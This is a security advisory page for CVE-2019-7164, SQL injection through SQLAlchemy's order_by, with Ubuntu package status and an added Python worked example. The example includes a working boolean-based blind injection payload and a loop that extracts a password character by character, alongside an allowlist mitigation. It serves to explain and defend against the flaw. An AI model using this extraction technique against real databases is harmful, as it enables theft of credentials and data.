CVE-2019-7164

Priority: Low
Description:
SQLAlchemy through 1.2.17 and 1.3.x through 1.3.0b2 allows SQL injection
via the order_by parameter.
Notes:
mdeslaur: since 1.0, sqlalchemy issues a warning when text() is omitted;
the fix for this issue turns the warning into an error. Since this change
may break existing applications, it may not get fixed; marking priority
as low.
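Worked example (added to this page; it is not code from the advisory, from Ubuntu or from SQLAlchemy): the bug class behind this CVE is that an ORDER BY expression cannot be a bound parameter, so when an application forwards a request-supplied string straight into order_by() and the library coerces that string to text(), the attacker's string reaches the database as SQL. The warning the note above refers to was the only signal an application got on affected versions; the upstream patch turns it into an error, and on fixed versions the application still has to map the untrusted key to a known column object itself. The script below uses only the standard library's sqlite3 to stand in for the coerced query: vulnerable_order_by() interpolates the sort string exactly as the coercion effectively did, leak_password() shows a boolean-based blind extraction that reads a column through nothing but the row order, and safe_order_by() is the allowlist mitigation. The users table, the password values and all function names are constructed for this example.

```python
import sqlite3

# Constructed sample data for the demonstration (not from the advisory).
SAMPLE_USERS = [
    (1, "admin", "s3cret"),
    (2, "bob", "hunter2"),
    (3, "carol", "letmein"),
]


def make_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_order_by(conn, sort):
    """Vulnerable pattern: the caller-supplied sort string becomes SQL text.

    This is the effect of handing an untrusted string to order_by() on the
    affected SQLAlchemy versions, which coerced it to text(). ORDER BY
    expressions cannot be bound parameters, so plain concatenation is what
    ends up reaching the database.
    """
    sql = "SELECT id, name FROM users ORDER BY " + sort
    return [row[0] for row in conn.execute(sql)]


def leak_password_char(conn, position,
                       alphabet="abcdefghijklmnopqrstuvwxyz0123456789"):
    """Boolean-based blind oracle: the row order reveals whether a guess is right.

    A correct guess sorts by id (ascending), a wrong one by -id (descending),
    so one character is learned without the column ever being displayed.
    """
    for guess in alphabet:
        payload = (
            "(CASE WHEN (SELECT substr(password, %d, 1) FROM users "
            "WHERE name = 'admin') = '%s' THEN id ELSE -id END)"
            % (position, guess)
        )
        if vulnerable_order_by(conn, payload) == [1, 2, 3]:
            return guess
    return None  # nothing in the alphabet matched: end of the string


def leak_password(conn, max_len=32):
    """Recover the admin password one character at a time via the oracle."""
    recovered = ""
    for position in range(1, max_len + 1):
        ch = leak_password_char(conn, position)
        if ch is None:
            break
        recovered += ch
    return recovered


# Mitigation: the sort key is looked up in an allowlist; the untrusted
# value itself never becomes part of the SQL text.
ALLOWED_SORTS = {"id": "id", "name": "name"}


def safe_order_by(conn, sort_key, descending=False):
    """Safe pattern: map the untrusted key to a known column or refuse it."""
    if sort_key not in ALLOWED_SORTS:
        raise ValueError("unsupported sort key: %r" % (sort_key,))
    direction = "DESC" if descending else "ASC"
    sql = "SELECT id, name FROM users ORDER BY %s %s" % (
        ALLOWED_SORTS[sort_key], direction)
    return [row[0] for row in conn.execute(sql)]


def rejects_sort_key(conn, sort_key):
    """True if safe_order_by() refuses the key instead of executing it."""
    try:
        safe_order_by(conn, sort_key)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY:", leak_password(db))
    print("allowlist rejects payload:", rejects_sort_key(db, "(SELECT 1)"))
```

The same allowlist shape is what a SQLAlchemy application needs regardless of version: resolve the request key to a column attribute (for example User.name) from a fixed mapping and pass that object to order_by(), never the raw string. The upstream error introduced by the patch stops the silent coercion, but it is the application-side mapping that turns an unexpected key into a handled error rather than a crash.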
Package
Upstream:needs-triage
Ubuntu 12.04 ESM (Precise Pangolin):DNE
Ubuntu 14.04 ESM (Trusty Tahr):DNE (trusty was needed)
Ubuntu 16.04 LTS (Xenial Xerus):needed
Ubuntu 18.04 LTS (Bionic Beaver):needed
Ubuntu 19.10 (Eoan Ermine):not-affected (1.2.18+ds1-2ubuntu1)
Ubuntu 20.04 (Focal Fossa):not-affected (1.2.18+ds1-2ubuntu1)
Patches:
Upstream:https://github.com/sqlalchemy/sqlalchemy/commit/30307c4616ad67c01ddae2e1e8e34fabf6028414

Updated: 2020-01-29 19:03:54 UTC (commit 40f18bf14da5fb50662e1f861ea594a462b207fe)